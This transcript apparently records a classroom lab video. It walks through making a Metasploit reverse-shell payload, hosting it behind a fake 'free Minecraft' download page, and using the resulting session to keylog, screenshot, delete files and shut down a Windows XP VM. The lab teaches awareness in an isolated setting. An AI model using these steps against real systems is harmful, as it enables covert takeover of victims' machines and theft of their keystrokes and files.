All right. Hello, everyone. Today we're going to have a little bit of fun in this lab. So if you remember some of our previous labs that we've done with viruses and stuff, we created a very basic virus. We created a very basic Trojan horse, but nothing too bad. Let's see how, let's do something a little bit more mischievous, something that you might actually see out in the wild. So I'm going to start here by opening up my Windows XP virtual machine, or virtual machine right here, and then I'm going to click on settings. Now make sure that both of your Windows XP machine is powered off and your Kali Linux machine is powered off. So both of these are powered off. I come here. If you're on tools, or like you're in snapshots right here, you just come back here to details, and then we can click on settings right there. I want to come down to network, and we're going to change this one to a bridged adapter right there. And then on advanced, I can just hit this MAC address, find a new MAC address, click OK. Then let's double click to boot this up. And we're going to need both our Windows XP machine and our Kali Linux machine running for this one. So for Kali Linux, I'm going to click on this. I'm going to click on settings. I'm going to go to network. Change this to a bridged adapter right here. Again, I'm going to spin open advanced, create a new MAC address for that, click OK, and double click on Kali Linux. So while both of these are booting up, let me describe what I just did. So before, when they were on NAT, a NAT network is basically just sharing the network connection that my host computer has or the actual computer has with the virtual machines. It's a great way to get your virtual machines connected to the internet and that kind of stuff. But if you actually want them to interface with one another or other computers on the network, like be able to, like this Kali Linux machine being able to talk to this this Windows XP machine or any other computer, you have to switch those to bridged. And what bridged will do is they will give both virtual machines a unique IP address, just like any other computer on the network. And we happen to be on the school network right now, so you don't need to do this, but I'm just going to go ahead and go to the command prompt right here, and I'm going to type in ipconfig right here. And you'll notice I get an IP address. This is the IP address of my main computer, the one that I'm running everything off of. It's 10.7.70.22. Now these first two things, that tells me that this is a computer basically running on the school network. And then these two, all computers running on the main South school network will have 10.7. Main East is 10.6. Main West is 10.5. And then these two numbers just vary. You have to have a unique IP address for every single computer that's on the network. Okay, so these two numbers right here are going to be unique to my actual computer. I'm hoping these two computers now also have unique IP addresses. So in order to tell that, we click on the Start menu, and I come to Run, and I'm going to type in CMD, and I'm going to type in ipconfig here. And notice I have a 10.7 address as well, but mine is different, 10.7.60.70. As long as yours has 10.7 right there, then you are good. That means that you have a valid IP address and you are ready to rock and roll, and this virtual machine will be able to connect to any other computer on the network or on the internet. Now let's check out our Kali Linux machine and make sure that this has a valid IP address. In order to do that, I opened up the terminal on here. Again, the terminal, you just kind of come over to here. The command in Linux is a little bit different. It's IF config. So instead of IP, whoops, not now. Instead of IP config, it's IF config. I hit enter. This one also has a valid IP address, 10.7.60.81. Excellent. Okay, so I'm ready to rock and roll. I have both my Windows XP machine up, which is going to be the target. This is who we want to hack. We're going to try to hack this Windows XP machine. And we have our Kali Linux machine right here, and this is going to be our like what we would be using. I'm going to actually bring up this. Okay, so this lab, I will link to this for sure, but I just kind of need this because I forget some of these commands, especially like this one right down here. So I'm going to come here. So we're going to want to type in, let me bring this up. The first, we're going to be using a program called Metasploit to create a virus. Okay, so this isn't just going to be a virus that shuts down the user's machine, or Metasploit is going to be a virus that we create where we can actually remotely connect to the target machine or our Windows XP machine from this computer, and we can basically take it over, do anything we want, take screenshots, key captures, we can delete files, we can execute commands, basically whatever we want. So first thing we need to do is we need to actually create that virus. So in order to create the virus, we're going to type in msfvnon venom -p space windows slash METERPRETER verse TCP. I'm just copying this stuff right up here. And then we type in space L host. Okay, so equals. So this L host right here, I want to copy this address right here. Yours is going to be different than mine. It should be 10.7, but then these two numbers right here are probably going to be different than mine. That's okay. We need to copy this, and this is going to be our L host right here. Oh, whoops. I think I need to go to paste. There we go. And then space -f exe space /var/www/html/fun.exe. Now, if you type one little letter in wrong or uppercase or lowercase in this, the whole thing is not going to work. So it's really important that you type in this exactly how it is right up here. The only difference is the L host equals. This part of the command needs to be your own IP address. And then we hit enter on here. And this should take a couple of seconds to complete. But that's totally okay. So while this is doing this, let's just talk about, like I said, we need to create the virus first on this Windows machine. So the virus is actually being saved right here in the www folder /html. Okay, so we've created this virus now, so that's positive. But now we need to entice the target or the Windows XP machine to download and execute this virus. So how are we going to do that? Well, I'm going to type in rm/var/www/html/index.html. Okay, what that command did was that removed a file that was on this www/html. This is a web server. We're actually going to create a website, and there's like a default web page right here, index.html. HTML. I want to actually recreate it using my own words. So now that I've done that, I'm going to type in nano/var/www/html/index.html. And now that I have that, I should have just a blank document here. And we're going to create a web page to try to get people to download that virus. So we're going to type in some basic HTML code. You guys don't need to know what this code means necessarily. Free. Okay, but you do need to type it in as I type it in. I think we called it fun.exe. That's our virus right there. Click here to download Minecraft free. All right, and almost done. Okay, so let's talk about what this is. This is a very, very, very basic web page with a link on it. And this link says, click here to download Minecraft for free. And when they click that link, they're going to download fun.exe. Now, fun.exe is the virus that we just created. So anyone that clicks this link and runs the fun.exe program will automatically have that virus on their system. So let's go ahead and save this. I'm going to hit Control O, hit Enter, Control X to exit out. Now we need to get that web server started up so people can actually connect to it. So in order to do that, I type in service Apache 2 start. Okay, so Apache is the name of the web server. So by typing service Apache 2 start, that just basically launches the web server on this Kali Linux machine. And anyone who now people can access this. You can even access this on this host machine right here. But we'll access it on the Windows XP machine here in a second. So before we download the virus and stuff, we need to prepare for somebody to download the virus. So we got to get our Metasploit all launched up and ready to go. So we type in MSF console to launch Metasploit. Okay, that's going to take a second to launch. Okay, let's have Metasploit. Metasploit's launching. Metasploit is a very dangerous piece of software that a lot of people use. Sometimes people call this script kiddie work, but it is what it is. So we're going to type in use multi-handler. Then we type in set payload. And again, capitalization, spelling, super important here, so double check every time before you hit enter. Okay, and then set L. And then this time we want that L host to just set it to 0.0.0, and then we'll type in exploit. Okay, and then it's basically going to just sit here and wait for the target to download the software, and once they do, if they download it and execute it, we have control of their computer. So now I'm going to come over here. I'm on the XP machine, and now I'm going to be a stupid user, and I'm going to be like, let's launch Windows or Google Chrome here. I really want to play Minecraft, but I don't have any money, so I wonder if I can do it for free. Well, if there's this website that I heard about, 10.7.60.81, and I think that they have Minecraft for free on here. Now, on your Windows XP machine, you're not going to want to go to 10.7.60.81. You're going to want to go to the IP address of your Kali Linux server. So my Kali Linux server is 10.7.60.81. Whatever yours is, that's where you're going. So I go to this Kali Linux server, free Minecraft. Click here to download Minecraft for free. Excellent. What a good deal. So I click on this, and down here it says fun.exe. All right, I'm up for some fun. I'll click and load this and hit run, and I'm ready to play some Minecraft here. Let's see what happens. Well, nothing really seems to be happening on here. I don't know. I'm looking for Minecraft. I don't know, whatever. I guess maybe that link was broken or something. So the target user thinks, I clicked on a bad link. Happens all the time. That's okay. Down here, though, you can see Metasploit. Metasploit was able to get in here. We were able to, actually attach ourselves. So if I type in help right here, I can see all the things that I can do to this target machine. So I can play audio clips. I can look at their webcam. I can take screenshots. We'll do a couple of these things, but I can reboot the system. I can do a ton of stuff. So one thing that we're going to want to do right off the bat here, and let me kind of scroll down here to find, we want to migrate the virus to Explorer.exe. So the reason we want to do this is right now that fun.exe is running on their system, but as soon as they log off the machine or restart the machine or anything like that, fun.exe won't run again. And we want this virus to run every time they boot up their computer. So we're going to migrate TACN and explore.exe. So once we do that, what this will do is this will take that virus and it will combine it with explore.exe. Explore.exe is basically, it's not Internet Explorer. It's the thing that you use to, like, when I click right here, this window right here, that's explore.exe. So explore.exe is the thing that you use to be able to basically view everything in Windows. So by migrating our virus to explore.exe, we have essentially said, hey, anytime anyone turns on this computer in the user interface world and like tries to browse for files or whatever, make sure the virus is running. So that's not good. So let's do a couple of let's kind of do a couple of fun things. First thing that I'm going to do here, first thing that I'm going to do is let's take a screenshot. So I'll type in screenshot right there, and it says the screenshot was saved to the root directory. So in order to check that out, I'm just going to move this over, open up files, and we notice right down here, here's a picture of the screenshot that we have over here. So if I was like a hacker or somebody, now that I have this virus on this computer, I'm just going to wait for them to do something stupid. So maybe they will, I don't know, whoops. Maybe they'll open up like, I don't know, all programs, accessories. Let's open up Notepad. This is my password, okay? And they start typing things in there. Well, I can go ahead and type in now. Let's take another screenshot, and we can see exactly what they typed in, which was, you know, this is my password. So now I can see like basically everything that they're doing on their computer. But let's do what's called a keystroke, like key scan start. So if I type in this key scan start as they're typing over here, this is a password. Okay, as they're typing over there, then you'd want to do the key scan dump, and you can see everything that they are typing in here. Okay, so every keystroke that is taken on the XP machine is being captured. And then if I come back over here and I hit this key scan dump, I see every keystroke that's taken, even all my spelling errors and stuff are done. So you have to have that key scan start, then it's scanning, then you do key scan dump to see whatever they've typed, and then key scan stop. We'll just stop this. Whoops, it's key scan underscore stop. Okay, so let's, now the last thing that I want to show you is I have this secret important document on here. So I want to be able to get to the command prompt, and I want to basically delete this file. Because that's a secret important file. So let's see if we can get to it. So in order to do that, I need to use the command. All right, sorry about that. Just had to look something up. I want to type in the command shell. Okay, so once I'm in shell, notice I get like, now it looks like C:/document/ Mr. Reichelt. So this gives me access to the command prompt of my Windows XP machine. So for instance, if I type in ipconfig right here, notice I see 10.7.60.70. That is the same IP address of this right here, 10.7. So anything that I type in right here will basically get executed on here. So I'm gonna do something kind of sneaky here. I'm gonna cd to my C drive, type in dir, then I'm gonna type in dir. This will list all the different places. Now I'm going to want to cd into this documents and settings. So cd into this base. CD stands for change directory. this basically allows me to go to that Documents and Settings folder. Now that I'm in here, I'm going to go to my user, Mr. Reichelt. Now you're probably going to have a different user name than me. That's totally okay. I'm just going to type in cd paste. Whatever your username is, just put that in there. Now I'll type in dir, and I want to cd to that desktop. Type in dir. Now this is really important. A lot of people save a lot of important things to their desktop. So I save this secret important document on there, and notice I can see that secret important document right here. So what if I'm going to copy that. What if I typed in that? Whoops, my mistake. I needed to type in delete quote, not star. I made a mistake there. Secret document, that text, unquote, and then hit enter. And notice as soon as I hit that, notice that goes away over there. Okay, so I can do all kinds of bad things. Like, what happens if I type in, oh, I need to exit out of the command prompt here. Now I can just type in like shutdown over here, and oh look, I just shut down their machine. So you see, let's see, what are the things that I just did? I took screenshots of this thing's desktop. I was able to see what they were typing using a key scanner program. Everything that they typed I was able to capture. I was able to access their command prompt and delete files, and now I just shut down their machine. So this thing has a virus on it, and basically anything that happens on that computer I can do and see, and it's not good. All right, so now that we have this lab is finished. What I'd like you to do, I'm going to close out of this right here to power off the machine. We need to take this Windows XP machine back in time to a time in which that virus was not on this machine. So we're going to go to snapshots, click on this after Z drive was installed, and hit that restore button. Oh, hit cancel, whoops. Click on this after Z drive, hit restore, uncheck this, create a snapshot, and hit restore. And then this Kali Linux machine, we shouldn't have any restore points, but that's okay because it just runs off of the ISO file, that CD. So should be good now, but hopefully you've seen now how easy it is for a script kiddie or somebody to create a legitimate virus that put on a Windows machine, or you can make this for a Mac or Chromebook or anything. You can really take it over and do anything. So one of the keys to this, make sure that you're running antivirus software. We have no antivirus software running on our Windows XP machine, which is why it wasn't able to detect anything bad going on. And number two, make sure that antivirus software stays up to date. So yeah. All right. Hopefully this lab was kind of fun. Let me know if you have any questions, problems, or issues.